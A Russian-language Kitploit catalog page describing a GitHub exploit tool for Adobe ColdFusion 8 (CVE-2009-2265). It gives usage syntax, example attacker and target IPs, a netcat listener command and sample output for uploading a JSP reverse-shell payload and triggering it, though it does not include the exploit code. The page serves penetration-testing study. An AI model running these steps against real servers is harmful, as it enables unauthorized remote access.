Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - Удаленное выполнение команд (RCE) | Kitploit
Инструменты/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - Удаленное выполнение команд (RCE)

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

Adobe ColdFusion 8 - Эксплуатация удаленного выполнения команд (RCE)

Обзор

Данный эксплойт направлен на известную уязвимость в Adobe ColdFusion 8 (CVE-2009-2265). Он обеспечивает удаленное выполнение команд (RCE) путем загрузки вредоносной JSP-нагрузки, устанавливающей обратную оболочку.


Детали эксплуатации

  • CVE: CVE-2009-2265
  • Уязвимость: Некорректная обработка загрузки файлов в Adobe ColdFusion 8.
  • Затрагиваемые версии: Adobe ColdFusion 8.
  • Воздействие: Позволяет злоумышленникам выполнять произвольные команды на сервере.

Возможности

  1. Автоматическая генерация JSP-нагрузки с помощью msfvenom.
  2. Загрузка нагрузки через multipart POST-запрос.
  3. Запуск нагрузки для установки обратной оболочки.
  4. Автоматическая очистка локальных файлов нагрузки после выполнения.

Использование

Для использования этого эксплойта вам потребуется:

  • Машина с Kali Linux или аналогичная среда для тестирования на проникновение.
  • Установленный Netcat для прослушивания указанного порта.
  • Уязвимый сервер Adobe ColdFusion 8.

Синтаксис команды

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

Аргументы

  • -l <LHOST>: Локальный IP-адрес атакующего (например, 10.10.16.5).
  • -p <LPORT>: Локальный порт атакующего для обратной оболочки (например, 9001).
  • -r <RHOST>: Удаленный IP-адрес цели (например, 10.10.10.11).
  • -q <RPORT>: Удаленный порт цели, на котором запущен ColdFusion (например, 8500).

Пример использования

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. Запустите слушатель на вашей атакующей машине:

    root@kitploit:~
    nc -lnvp 9001
    
  2. Выполните эксплойт с соответствующими аргументами.

  3. После выполнения нагрузка подключится обратно к вашему слушателю.


Как это работает

  1. Генерация нагрузки:

    • Скрипт использует msfvenom для создания вредоносной JSP-нагрузки.
    • Нагрузка инициирует обратную оболочку на указанные LHOST и LPORT.
  2. Загрузка нагрузки:

    • Нагрузка загружается на уязвимый сервер ColdFusion с помощью POST-запроса.
  3. Запуск нагрузки:

    • Загруженная нагрузка выполняется путем отправки GET-запроса к URL файла.
  4. Установка обратной оболочки:

    • Устанавливается обратная оболочка, предоставляющая атакующему доступ к целевой системе.

Требования

  • msfvenom для генерации нагрузки.
  • curl для загрузки и запуска нагрузки.
  • nc (Netcat) для прослушивания соединений обратной оболочки.

Пример вывода

root@kitploit:~
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Используйте его только на системах, которые вам принадлежат или на которые у вас есть явное разрешение на тестирование. Несанкционированное использование этого эксплойта на системах, которые вам не принадлежат, является незаконным и неэтичным.


Автор

Разработано [0xDTC].

Скачать инструмент